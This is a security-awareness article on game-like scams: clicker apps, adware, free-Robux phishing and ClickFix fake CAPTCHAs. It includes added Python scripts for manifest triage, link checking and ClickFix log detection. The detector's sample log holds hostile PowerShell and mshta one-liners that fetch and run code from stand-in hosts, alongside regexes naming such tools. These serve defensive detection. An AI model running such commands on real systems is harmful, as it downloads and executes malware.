Gamified attacks: don’t let a hacker play you
Gamified attacks use game-like mechanics — rewards, tasks, and even the feeling of “just one last step” — to push you into clicking, granting permissions, entering a password, or running a malicious command. The article presents four typical scenarios: clicker malware, intrusive adware, fake CAPTCHA, and scams promising free in-game rewards. This is not some genius hacking — it is calculated manipulation designed to turn your device into a source of profit for the attacker.
At first glance, it may look like an innocent game, a useful app, or a quick “win” within reach. In reality, though, it is not entertainment — it is manipulation. Gamified attacks use game-like mechanics — rewards, step-by-step progress, time pressure, and the feeling of “just one more click” — to subtly push you into granting permissions, entering sensitive information, or running something you would otherwise refuse. And the reward? The attacker gets it, whether in the form of ad revenue, stolen accounts, or your data. Let’s take a look at what forms this kind of trap can take.
Lvl 1: Clicker malware
Lvl 2: Intrusive adware
Lvl 3: Free rewards
Lvl 4: Fake CAPTCHA
Lvl 1: Clicker malware
Clicker malware is a malicious app that pretends to be a game or a useful tool — such as a QR scanner, flashlight, “cleaner,” or camera — but in reality it opens ads in the background and automatically clicks on them. This allows the attacker to make money, because advertising systems are tricked into thinking the activity comes from a real person. You pay for it through faster battery drain, higher data usage, and a slower phone.
Why is it gamified? These apps often lure users in with a simple and attractive promise: “premium for free,” “light version,” or “performance boost.” Everything seems normal, and the problem often appears only after some time, so you do not immediately connect it to the installation.
“Useful” apps on Google Play
McAfee described a case in which a group of apps made it into Google Play while posing as ordinary tools, but in reality they acted as ad-clicking machines after installation. There were 16 apps in total, most commonly flashlights, QR scanners, camera apps, converters, or task managers. Together, they had around 20 million installs. Once discovered, they were removed from the store.
The biggest “star” of the whole set? DxClean presented itself as a regular phone cleaning tool meant to help improve performance and maintain the device. In reality, however, it was one of the most downloaded apps in the entire malicious bundle. What made it even more deceptive was how trustworthy it seemed to users — it still maintained a relatively high rating of 4.1 out of 5 stars.
Games that clicked on ads
Check Point had already described the “Judy” campaign, in which dozens of apps — mostly games — abused users’ phones to generate fake ad clicks. This was far from a marginal issue: estimates pointed to millions of downloads. In fact, the campaign became one of the largest ad fraud cases to hit Google Play at the time. On the surface, however, these apps looked like ordinary entertainment, with nothing to suggest that they were actually making money for attackers.
Who was behind them? The malicious apps were linked to the Korean company Kiniwini, which appeared on Google Play under the name ENISTUDIO corp. The company normally developed mobile apps for both Android and iOS, so its presence in the store did not necessarily seem suspicious at first glance.
What determines the outcome of this level? Staying in control.
Such apps can quietly drain your battery, increase data usage, and slow down your phone without you realizing what is causing the problem. Keep in mind that even apps from official stores are not automatically safe — it is always a good idea to check the developer, reviews, and requested permissions.
Lvl 2: Intrusive adware
This is an app that pretends to be a harmless helper — such as an emoji editor, cleaner, or battery optimization tool — but after installation it starts flooding you with aggressive ads. These ads often appear outside the app itself, for example on your home screen or after unlocking your phone. Some variants also keep running in the background, which means the ads keep coming back even after the device is restarted.
Why is it gamified? Because it lures you in with what seems like a useful upgrade: a faster phone, longer battery life, better emojis, or premium features for free. At first, it appears completely normal, so you often do not connect the problem to the app until the moment you have already started to trust it.
“GhostAd” on Google Play
Check Point described a network of apps on Google Play that appeared to be ordinary utilities or emoji tools, but in reality they launched an advertising module in the background that kept running even after the app was closed or the phone was restarted. The campaign included at least 15 related apps, gathered millions of downloads in total, and one of them even reached second place in the Top Free Tools ranking.
The biggest warning sign? Two major red flags kept appearing in user reviews: ads were showing up outside the app itself, and for some users the icon disappeared after installation, making the malicious app much harder to find and uninstall.
Hidden apps
In one campaign, malicious apps disguised themselves as cleaners or battery optimization tools. After installation, they were able to launch on their own, even without any user action, and repeatedly displayed ads. To make removal more difficult, they could also change their name and icon to resemble system apps, such as “Google Play” or “Settings.” According to McAfee, these apps had anywhere from hundreds of thousands to more than a million installs, and they were also spread through ad pages on Facebook.
What made them especially deceptive? Because they renamed themselves to “Settings” or “Google Play,” users often could not even tell which app they were actually supposed to delete from their phone.
What determines the outcome of this level? Awareness.
When an app starts flooding your phone with ads, pushing you toward more installs, or nudging you into suspicious “subscriptions,” it is not just annoying — it is a way to profit from you. If ads start appearing outside the app itself or the app becomes difficult to uninstall, it is time to raise a red flag and remove it from your phone.
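One way to act on the advice above about checking requested permissions before trusting an app: the following Python script performs a static triage of an Android manifest for the behaviours described under Levels 1 and 2 (starting itself at boot, drawing ads over other apps, a launcher entry labelled like a system app, an icon that can be swapped or hidden). It is an added example, not code from the article or from any of the vendors it cites; the two manifests, the package names and the list of system-like labels are constructed for the illustration, and the checks are heuristics (a hit means "look closer", not "malware").

```python
"""Static manifest triage for the adware/clicker red flags described in the text.
Added example with constructed input; heuristic only."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest modelled on the behaviours in the article: a "cleaner" that
# starts at boot, can draw over other apps, and whose launcher entry is an alias
# labelled "Settings" so the icon can later be renamed or hidden.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fastcleaner">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Fast Cleaner">
    <activity android:name=".MainActivity"/>
    <activity-alias android:name=".SettingsAlias"
                    android:targetActivity=".MainActivity"
                    android:label="Settings">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity-alias>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed benign manifest for comparison: one launcher activity, no boot receiver.
BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Labels the article says the hidden apps borrowed; extend as needed (constructed list).
SYSTEM_LIKE_LABELS = {"settings", "google play", "google play services"}


def attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def triage_manifest(xml_text):
    """Return a list of human-readable findings for the manifest (empty = nothing odd)."""
    root = ET.fromstring(xml_text)
    findings = []
    perms = {attr(p, "name") for p in root.iter("uses-permission")}

    # Level 2 behaviour: "able to launch on their own" after a restart.
    boot_receiver = any(attr(act, "name") == "android.intent.action.BOOT_COMPLETED"
                        for r in root.iter("receiver") for act in r.iter("action"))
    if "android.permission.RECEIVE_BOOT_COMPLETED" in perms and boot_receiver:
        findings.append("starts itself at boot (receiver for BOOT_COMPLETED)")

    # Ads "outside the app itself" need the overlay permission.
    if "android.permission.SYSTEM_ALERT_WINDOW" in perms:
        findings.append("can draw over other apps (SYSTEM_ALERT_WINDOW)")

    app = root.find("application")
    app_label = (attr(app, "label") or "") if app is not None else ""
    for comp in list(root.iter("activity")) + list(root.iter("activity-alias")):
        is_launcher = any(attr(c, "name") == "android.intent.category.LAUNCHER"
                          for c in comp.iter("category"))
        if not is_launcher:
            continue
        label = (attr(comp, "label") or app_label).strip().lower()
        if label in SYSTEM_LIKE_LABELS:
            findings.append(f"launcher entry labelled like a system app: {label!r}")
        if comp.tag == "activity-alias":
            findings.append("launcher entry is an activity-alias "
                            "(icon can be swapped or hidden at runtime)")
    return findings


if __name__ == "__main__":
    for name, manifest in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, triage_manifest(manifest) or ["no findings"])
```

The script reads the decoded `AndroidManifest.xml` (for example as produced by apktool); it does not look at runtime behaviour, so an app that hides its icon purely through code would still need dynamic analysis or a look at the reviews the article mentions.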
Lvl 3: Free rewards
These scams promise free Robux, skins, or other rewards and lead you through several seemingly simple steps, such as choosing a platform, entering your username, or confirming the “last step.” In reality, though, there is no reward at all — the goal is to steal your login credentials, personal data, or trick you into installing an app or signing up for something.
Why is it gamified? Because the attack creates a false sense that the reward is almost within reach. You are led through a series of tasks — filling out a form, logging in, or completing a so-called “verification” — while pop-ups like “Last step!” and time pressure are meant to keep you from stopping to think, so that you simply finish that final step.
Roblox phishing in chat
This is a typical scenario in which an attacker contacts a victim in a Roblox chat or on another platform, promises them “free Robux,” and sends a link to a page styled to look like Roblox. The page then asks for a username and password. The scam often seems convincing precisely because it imitates the look of a familiar platform and relies on the user reacting without thinking too much. Once the user enters their details, the attacker can take over the account and steal the victim’s Robux.
The trickiest part? The moment a page promising free Robux asks for your password, it is not a reward — it is a login trap. The goal is not to give anything away, but to gain access to your account.
Free Fire and “free diamonds”
Scammers lure Free Fire players with promises of free diamonds, the game’s premium currency used to buy various rewards and items. The link usually leads to a page that promises a quick gain after a few simple steps — entering a username, choosing a platform, logging in, or completing the “last step.” In reality, however, there is no reward at all — the goal is to gain access to the victim’s account, payment details, or device.
Where is the trap? Free diamonds in exchange for a login or card details are not a reward — they are a scam. Real bonuses come only through official events and approved channels.
What determines the outcome of this level? Keeping a cool head.
This kind of scam can cost you your account, in-game currency, and valuable items, so if a supposed reward pushes you through a “last step,” a login, or an installation, it is time to stop — real bonuses do not come through third-party websites.
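The reward pages in this level work because they look like the real platform, while the only thing that matters is which host the browser actually connects to. The Python snippet below is an added example (not from the article) of that check: it extracts the real host from a link and compares it against an allowlist of genuine domains. The allowlist and every URL are constructed for the illustration; `roblox.com` is the only domain the article names.

```python
"""Check whether a 'free rewards' link really goes to the platform it imitates.
Added example with constructed inputs."""
from urllib.parse import urlsplit

# Constructed allowlist: the genuine domain of the platform being imitated.
OFFICIAL_DOMAINS = {"roblox.com"}


def host_of(url):
    """Return the lowercased host the browser would connect to, or None."""
    if "//" not in url:            # links are often pasted without a scheme
        url = "https://" + url
    host = urlsplit(url).hostname  # drops user@ prefixes, ports and the path
    return host.rstrip(".") if host else None


def is_official_host(url, official=OFFICIAL_DOMAINS):
    """True only if the host is the official domain or a subdomain of it."""
    host = host_of(url)
    if host is None:
        return False
    return any(host == d or host.endswith("." + d) for d in official)


def explain(url):
    host = host_of(url)
    if is_official_host(url):
        return f"OK: {url} goes to {host}"
    return f"TRAP: {url} looks familiar but actually goes to {host}"


if __name__ == "__main__":
    for link in ("https://www.roblox.com/login",
                 "https://roblox.com.free-robux.example/login",   # brand in a subdomain
                 "https://roblox.com@login.example/claim",        # brand in the user part
                 "https://free-robux.example/roblox.com/login",   # brand in the path
                 "https://rob1ox.com/login"):                     # look-alike spelling
        print(explain(link))
```

The three lookalike patterns in the usage block (brand as a subdomain, brand before an `@`, brand in the path) are the ones a glance at the address bar most easily misses; the host comparison ignores all of them.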
Lvl 4: Fake CAPTCHA
ClickFix is a social engineering technique that does not rely on exploiting a technical vulnerability, but on manipulating you. The attacker tricks you into running a malicious command yourself — often under the pretense of a routine check such as “Verify you are human.” The page then shows a simple set of instructions: open Run, paste the command, and confirm. In reality, though, you are launching the infection yourself.
Why is it gamified? Because the attack uses clearly separated steps that feel like completing a task or mini-quest: “1/3… 2/3… 3/3.” It also creates the sense that only one final step remains, while visually imitating familiar elements such as CAPTCHAs, error messages, or security warnings.
Fake GitHub notifications
Proofpoint described a campaign in which attackers abused GitHub notifications to send emails posing as security alerts. A link in such a message led to a fake website imitating GitHub, where the victim was met with a fake CAPTCHA using the ClickFix technique. The user was instructed to open the Run window, paste a command, and confirm it — resulting in the download of a malicious file and the installation of Lumma Stealer malware.
The trickiest part? The page often copied the malicious command to the clipboard automatically, making the user feel as though they were simply completing a routine verification. In reality, however, they were triggering the malware download themselves — and the whole process was designed to look like a quick routine, not an infection.
“Booking.com” phishing
Microsoft disclosed a phishing campaign that had been targeting organizations in the hospitality sector since December 2024 while impersonating Booking.com. Attackers sent emails using various pretexts, such as negative reviews, guest messages, or account verification, with links leading to a fake page designed to mimic Booking.com. There, users were shown a fake CAPTCHA using the ClickFix technique, which instructed them to open the Run window, paste a command, and confirm it.
Where was the catch? The fake page looked like a routine verification step and often copied the command to the clipboard automatically, so the user simply followed the instructions without much thought. In reality, though, they were launching the malicious code themselves.
What determines the outcome of this level? Vigilance.
This kind of attack can lead to the theft of your passwords, cookies, etc., making it easier for attackers to take over accounts or gain further access to your environment. The moment a “CAPTCHA” asks you to copy and run commands, it is not verification — it is a trap, and the best thing you can do is close the page immediately.
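For the defender side of this level: the ClickFix flow described above ends with the victim pasting a command into the Run dialog, which Explorer hosts, so the resulting shell is a child of explorer.exe with a command line that fetches and runs remote content. The Python script below, added here as an example and not taken from the article or from Proofpoint or Microsoft, applies that logic to process-creation log lines. The log records, their key=value layout, the paths, IP address and URLs are all constructed for the illustration and do not follow any real product's schema.

```python
"""Flag ClickFix-style process launches in process-creation logs.
Added example with constructed records; the log format is an assumption."""
import ntpath
import re

# Constructed records, one per line: a ClickFix paste, a normal Notepad launch,
# a second ClickFix variant, a build script from a developer shell, and a user
# who simply opened PowerShell from the Run dialog.
SAMPLE_LOG = r"""
ts=2025-03-10T09:12:01Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -w hidden -c "iwr http://203.0.113.7/verify.txt | iex""
ts=2025-03-10T09:15:44Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmd="notepad.exe C:\Users\alice\notes.txt"
ts=2025-03-10T09:20:02Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmd="mshta https://captcha.example.invalid/verify"
ts=2025-03-10T09:31:19Z parent="C:\Program Files\Git\git-bash.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -File build.ps1"
ts=2025-03-10T09:40:05Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -NoExit"
"""

LINE_RE = re.compile(r'^ts=(\S+) parent="([^"]*)" image="([^"]*)" cmd="(.*)"$')

# Interpreters a pasted ClickFix one-liner typically ends up in.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Content signals on the command line, each with the reason reported for it.
CONTENT_INDICATORS = [
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl|certutil)\b", re.I),
     "fetches remote content"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "executes fetched text"),
    (re.compile(r"https?://", re.I), "contains a URL"),
    (re.compile(r"-(w|windowstyle)\s+hidden\b|-enc(odedcommand)?\b", re.I),
     "hidden window or encoded command"),
]


def parse_event(line):
    """Parse one constructed record into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, parent, image, cmd = m.groups()
    return {"ts": ts, "parent": ntpath.basename(parent).lower(),
            "image": ntpath.basename(image).lower(), "cmd": cmd}


def clickfix_reasons(event):
    """Return the reasons an event looks like a ClickFix launch (empty = no)."""
    # Structural signal: the Run dialog is hosted by Explorer, so the pasted
    # command's interpreter has explorer.exe as its parent.
    if event["parent"] != "explorer.exe" or event["image"] not in SHELL_IMAGES:
        return []
    reasons = [why for rx, why in CONTENT_INDICATORS if rx.search(event["cmd"])]
    # A shell opened from Run with a plain command line is ordinary user activity.
    return ["shell launched from Explorer"] + reasons if reasons else []


def find_clickfix(log_text):
    """Scan a block of records and return the suspicious ones with their reasons."""
    hits = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        reasons = clickfix_reasons(event)
        if reasons:
            hits.append({"ts": event["ts"], "image": event["image"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_LOG):
        print(hit["ts"], hit["image"], "->", "; ".join(hit["reasons"]))
```

The structural check (explorer.exe parent plus a script interpreter) is what keeps the developer's `powershell -File build.ps1` and the user's plain `powershell -NoExit` out of the results; the content indicators are deliberately broad because the exact one-liner changes from campaign to campaign.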
This result was supported by the SOCCER project, funded under Grant Agreement No. 101128073, with the support of the European Cybersecurity Competence Center (ECCC).